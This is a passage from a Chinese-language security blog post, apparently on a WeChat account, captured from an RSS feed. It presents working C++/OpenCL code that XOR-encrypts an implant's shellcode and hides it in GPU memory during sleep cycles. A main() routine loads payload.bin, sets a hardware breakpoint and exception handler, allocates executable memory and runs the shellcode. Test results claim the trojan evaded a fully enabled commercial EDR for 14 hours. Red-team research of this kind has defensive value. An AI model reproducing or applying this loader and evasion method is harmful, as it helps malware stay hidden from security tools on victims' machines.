style="margin-top: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;word-break: break-all;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">// 定义加密和解密内核的源代码</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/></span></span></span></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cpp"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">const</span> <span class="code-snippet__keyword">char</span>* source =                </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__string">&#34;__kernel void fun(__global char* data) {\n&#34;</span>                </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__string">&#34;    int gid = get_global_id(0);\n&#34;</span>                </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__string">&#34;    const char k = 0x6C;\n&#34;</span>                </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__string">&#34;    data[gid] ^= k;\n&#34;</span>                </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__string">&#34;}\n&#34;</span>;                </span></code><code><span class="code-snippet_outer">               </span></code><code><span class="code-snippet_outer">program = clCreateProgramWithSource(context, <span class="code-snippet__number">1</span>, &amp;source, <span class="code-snippet__literal">NULL</span>, <span class="code-snippet__literal">NULL</span>);                </span></code><code><span class="code-snippet_outer">clBuildProgram(program, <span class="code-snippet__number">1</span>, &amp;device, <span class="code-snippet__literal">NULL</span>, <span class="code-snippet__literal">NULL</span>, <span class="code-snippet__literal">NULL</span>);                </span></code><code><span class="code-snippet_outer">encrypt_kernel = clCreateKernel(program, <span class="code-snippet__string">&#34;fun&#34;</span>, <span class="code-snippet__literal">NULL</span>);                </span></code><code><span class="code-snippet_outer">decrypt_kernel = clCreateKernel(program, <span class="code-snippet__string">&#34;fun&#34;</span>, <span class="code-snippet__literal">NULL</span>);</span></code></pre></section><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">在加解密内核算法动态编译后就可以直接调用相应对象来执行了。这里用到的API是</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">clSetKernelArg()</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">方法。</span></span></span></span></p><p style="margin-top: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;word-break: break-all;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">// 这里将之前创建的buffer设置为encrypt_kernel函数的第一个参数（参数索引从0开始）。encrypt_kernel是一个在设备上执行的函数，在GPU上进行并行计算。</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">clSetKernelArg(encrypt_kernel, 0, sizeof(cl_mem), &amp;buffer);</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"></span></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">然后就是启动队列，开始并完成计算任务。</span></span></span></span></p><p style="margin-top: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;word-break: break-all;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">// 在命令队列queue上排队执行内核函数encrypt_kernel。1表示工作项的维度是1，&amp;dataSize定义了这个维度上的工作项数量。所以这里是在队列上启动dataSize个工作项来并行执行encrypt_kernel函数。</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">clEnqueueNDRangeKernel(queue, encrypt_kernel, 1, NULL, &amp;dataSize, NULL, 0, NULL, NULL);</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/>

                <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">// 等待queue上的所有命令完成。这是一个阻塞操作，会阻塞主线程，直到队列上的所有命令（包括上面的encrypt_kernel函数）都执行完成。</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">clFinish(queue);</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"></span></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">相对应的，每个休眠周期结束后还要有取出植入体的环节。</span></span></span></span></p><p style="margin-top: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;word-break: break-all;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">// 和前面的加密相同，设置一个名为decrypt_kernel的OpenCL内核函数的参数。它指定内核函数的第一个参数是之前创建的OpenCL内存对象（buffer）。</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">clSetKernelArg(decrypt_kernel, 0, sizeof(cl_mem), &amp;buffer);</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/>

                <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">// 解密，加密逆过来。</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">clEnqueueNDRangeKernel(queue, decrypt_kernel, 1, NULL, &amp;dataSize, NULL, 0, NULL, NULL);</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/>

                <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">// 阻塞线程，等待队列任务完成。</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">clFinish(queue);</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/>

                <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">// 给一个临时堆块用来临时放植入体</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">outputData = new char[dataSize];</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/>

                <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">// 将解密后的数据从计算设备的内存（即OpenCL内存对象buffer）读回到主机内存（outputData指向的空间）。CL_TRUE参数指示这个读操作是阻塞的，即函数调用将等待直到所有数据被读回并复制到outputData指向的内存区域完成。</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">                <br/></span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="">clEnqueueReadBuffer(queue, buffer, CL_TRUE, 0, dataSize, outputData, 0, NULL, NULL);</span></span></span></span><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"></span></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">在Windows 10及以上系统的任务管理器中，如果仔细观察可以发现每个周期触发读写时GPU设备的运算核心、总线带宽、GPU专有内存等占用率都会有小幅度变化。但作为科学计算使用的标准库，只要不是挖矿，在文件本身免杀的情况下EDR都不会对其调用GPU设备的行为作出干涉。          </span></span></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000522" data-ratio="0.8379629629629629" data-s="300,640" style="height: auto !important;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=fb6f2f7d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFGWwd1SqDlezltYdgLTia2MgicOZZtEUxPic51gj8IKcEPCbxrImtdAZZA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;"></span></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:实现;"><span style="mso-bookmark:访问计算设备gpu）;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;"><br/></span></span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="color: rgb(2, 30, 170);font-size: 20px;"><strong><span style="font-size: 20px;color: rgb(2, 30, 170);font-family: 宋体;font-variant: normal;text-transform: none;">效果测试</span></strong></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:效果测试;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">测试条件如下：</span></span></span></p><p style="margin-left: 36pt;text-indent: -24pt;line-height: 1.5em;margin-bottom: 16px;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">•<span style="font:7.0pt Times New Roman;"></span></span><span style=""><span style="mso-bookmark:效果测试;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">Windows 10 22H2；</span></span></span></p><p style="margin-left: 36pt;text-indent: -24pt;line-height: 1.5em;margin-bottom: 16px;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">•<span style="font:7.0pt Times New Roman;"></span></span><span style=""><span style="mso-bookmark:效果测试;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">某国外EDR企业版，防护全开，特征库和检测引擎升级到最新版；</span></span></span></p><p style="margin-left: 36pt;text-indent: -24pt;line-height: 1.5em;margin-bottom: 16px;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">•<span style="font:7.0pt Times New Roman;"></span></span><span style=""><span style="mso-bookmark:效果测试;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">反射加载器使用donut生成，带有一些恶意特征；</span></span></span></p><p style="margin-left: 36pt;text-indent: -24pt;line-height: 1.5em;margin-bottom: 16px;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">•<span style="font:7.0pt Times New Roman;"></span></span><span style=""><span style="mso-bookmark:效果测试;"><span style="">testoop.exe</span></span></span><span style=""><span style="mso-bookmark:效果测试;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">使用了本文中的对抗方案，</span></span></span><span style=""><span style="mso-bookmark:效果测试;"><span style="">noptest.exe</span></span></span><span style=""><span style="mso-bookmark:效果测试;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">仅做了休眠期间的植入体加密；</span></span></span></p><p style="margin-left: 36pt;text-indent: -24pt;line-height: 1.5em;margin-bottom: 16px;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">•<span style="font:7.0pt Times New Roman;"></span></span><span style=""><span style="mso-bookmark:效果测试;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">设置植入体休眠间隔5-10秒。</span></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:效果测试;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">测试用</span></span></span><span style=""><span style="mso-bookmark:效果测试;"><span style="">main()</span></span></span><span style=""><span style="mso-bookmark:效果测试;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">函数以及说明如下：</span></span></span></p><p style="margin-top: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;word-break: break-all;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:效果测试;"><span style="">// hwbp是封装的工具类示例化对象，作全局对象。后续发布类库会在头文件中详细说明使用方法。</span></span></span><span style=""><span style="mso-bookmark:效果测试;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">              <br/></span></span></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cpp"><code><span class="code-snippet_outer"><span class="code-snippet__function"><span class="code-snippet__keyword">int</span> <span class="code-snippet__title">main</span><span class="code-snippet__params">()</span> </span>{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">/* ---- 模拟从其他地方（如服务器/加密文件等）获取shellcode后清除副本 ---- */</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 打开二进制文件</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__function">ifstream <span class="code-snippet__title">file</span><span class="code-snippet__params">(<span class="code-snippet__string">&#34;C:\\Users\\Administrator\\Desktop\\payload.bin&#34;</span>, <span class="code-snippet__built_in">std</span>::ios::binary)</span></span>;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span> (!file.is_open()) {</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">cerr</span> &lt;&lt; <span class="code-snippet__string">&#34;Failed to open shellcode file.&#34;</span> &lt;&lt; <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">endl</span>;</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">return</span> <span class="code-snippet__number">-1</span>;</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 获取文件大小</span></span></code><code><span class="code-snippet_outer">    file.seekg(<span class="code-snippet__number">0</span>, <span class="code-snippet__built_in">std</span>::ios::end);</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::streampos size = file.tellg();</span></code><code><span class="code-snippet_outer">    file.seekg(<span class="code-snippet__number">0</span>, <span class="code-snippet__built_in">std</span>::ios::beg);</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 读取文件内容到数组</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">char</span>* buffer = <span class="code-snippet__keyword">new</span> <span class="code-snippet__keyword">char</span>[size];</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span> (!file.read(buffer, size)) {</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">cerr</span> &lt;&lt; <span class="code-snippet__string">&#34;Failed to read shellcode file.&#34;</span> &lt;&lt; <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">endl</span>;</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">delete</span>[] buffer;</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">return</span> <span class="code-snippet__number">-1</span>;</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 关闭文件</span></span></code><code><span class="code-snippet_outer">    file.close();</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">/* ---- 模拟从其他地方（如服务器/加密文件等）获取shellcode后清除副本 ---- */</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">/* ---- 工具类使用固定模版 ---- */</span></span></code><code><span class="code-snippet_outer">    hwbp.setHardwareBreakpoint();</span></code><code><span class="code-snippet_outer">    AddVectoredExceptionHandler(<span class="code-snippet__number">1</span>, myVEHHandler);</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 记录shellcode体积并二次加密转储到VRAM</span></span></code><code><span class="code-snippet_outer">    hwbp.shellcodeSize = size;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// XOR加密</span></span></code><code><span class="code-snippet_outer">    hwbp.scEncryptDecrypt(buffer, size);</span></code><code><span class="code-snippet_outer">    hwbp.hiddenTool.writeToGPUVram(buffer);</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">/* ---- 工具类使用固定模版 ---- */</span></span></code><code><span class="code-snippet_outer">    </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 为shellcode首次执行做准备，分配内存空间并拷贝，最后删除内存中的临时副本；为对抗API检测，实际环境中这里建议使用Syscall</span></span></code><code><span class="code-snippet_outer">    LPVOID mem = VirtualAlloc(<span class="code-snippet__literal">NULL</span>, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span> (mem == <span class="code-snippet__literal">NULL</span>) {</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">cerr</span> &lt;&lt; <span class="code-snippet__string">&#34;Failed to allocate memory.&#34;</span> &lt;&lt; <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">endl</span>;</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">return</span> <span class="code-snippet__number">-1</span>;</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">memcpy</span>(mem, buffer, size);</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">delete</span>[] buffer;</span></code><code><span class="code-snippet_outer">    </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">/* ---- 工具类使用固定模版 ---- */</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 全局记录shellcode内存位置</span></span></code><code><span class="code-snippet_outer">    hwbp.shellcodeAddr = (<span class="code-snippet__keyword">char</span>*)mem;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// XOR解密</span></span></code><code><span class="code-snippet_outer">    hwbp.scEncryptDecrypt((<span class="code-snippet__keyword">char</span>*)mem, size);</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">/* ---- 工具类使用固定模版 ---- */</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// 执行shellcode，释放植入体。每次执行Sleep()将会通过硬件断点进入自定义VEH回调函数，在回调函数中清除内存中的代码，睡眠后再调用OpenCL内核从VRAM中取回</span></span></code><code><span class="code-snippet_outer">    ((<span class="code-snippet__keyword">void</span>(*)())mem)();</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">endif</span></span></span></code></pre></section><p style="margin-top: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;word-break: break-all;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><br/></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:效果测试;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">直接看效果如下：</span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:效果测试;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">木马上线后，执行了system命令、whoami命令、浏览了文件系统。</span></span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:效果测试;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">运行几分钟后，未使用该方案的</span></span></span><span style=""><span style="mso-bookmark:效果测试;"><span style="">noptest.exe</span></span></span><span style=""><span style="mso-bookmark:效果测试;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">被提示系统内存中检测到</span></span></span><span style=""><span style="mso-bookmark:效果测试;"><span style="">Trojan.Win64.Cometer.gen</span></span></span><span style=""><span style="mso-bookmark:效果测试;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">，随后进程被强制Kill；使用该方案的</span></span></span><span style=""><span style="mso-bookmark:效果测试;"><span style="">testoop.exe则</span></span></span><span style=""><span style="mso-bookmark:效果测试;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">持续存活，截止截图时已达14小时。        </span></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000523" data-ratio="0.7231481481481481" data-s="300,640" style="height: auto !important;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=751e193b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFjyibN5ng17nialtR874lMxu8SvzfZJVeFCjjVyuT4hN0L9rMSdwKCKuQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style=""><span style="mso-bookmark:效果测试;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">     <br/>

              <br/></span></span></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="mso-bookmark:参考文献;"><span style="font-family:宋体;mso-ascii-font-family:Calibri;font-variant:normal;text-transform:none;"></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style=""></span><span style="mso-bookmark:效果测试;"></span><span style="mso-bookmark:参考文献;"><span style="font-family:宋体;mso-ascii-font-family:Calibri;font-variant:normal;text-transform:none;">参考链接</span></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">https:<span class="code-snippet__comment">//xz.aliyun.com/t/14310?time__1311=GqAxuD9QGQKxlxGgx%2BxCwofKG8FWGCYFfeD#toc-3</span></span></code><code><span class="code-snippet_outer">https:<span class="code-snippet__comment">//www.vaadata.com/blog/antivirus-and-edr-bypass-techniques/</span></span></code><code><span class="code-snippet_outer">https:<span class="code-snippet__comment">//avantguard.io/en/blog/overload-mapping-vs.-memory-scanners</span></span></code><code><span class="code-snippet_outer">https:<span class="code-snippet__comment">//github.com/Dec0ne/HWSyscalls</span></span></code><code><span class="code-snippet_outer">https:<span class="code-snippet__comment">//dtsec.us/2023-09-15-StackSpoofin/</span></span></code><code><span class="code-snippet_outer">https:<span class="code-snippet__comment">//github.com/mgeeky/ThreadStackSpoofer/tree/master</span></span></code><code><span class="code-snippet_outer">https:<span class="code-snippet__comment">//github.com/vxunderground/VXUG-Papers/blob/main/GpuMemoryAbuse.cpp</span></span></code></pre></section><p style="text-align: center;"><br/></p><p><br/></p><p><br/></p><p><br/></p><p><br/></p><p><br/></p><p><br/></p><p><br/></p><p><br/></p><p><br/></p><p><br/></p><p><br/></p><p><br/></p><p><br/></p><p><br/></p><p><br/></p><p><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484184">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=3205b0a6&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247484184%26idx%3D1%26sn%3D101b31368a5a3b3f2d1f3c1b68ecb628%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 13 Nov 2024 22:00:00 +0800</pubDate>
    </item>
    <item>
      <title>ADConf 11.13 北京见</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247484126&amp;idx=1&amp;sn=26777d2b86c945f020ad36bd00a3f65b</link>
      <description>ADConf，专注于实战攻防技术；ADConf2024聚焦“Al+安全”。</description>
      <content:encoded><![CDATA[<p>
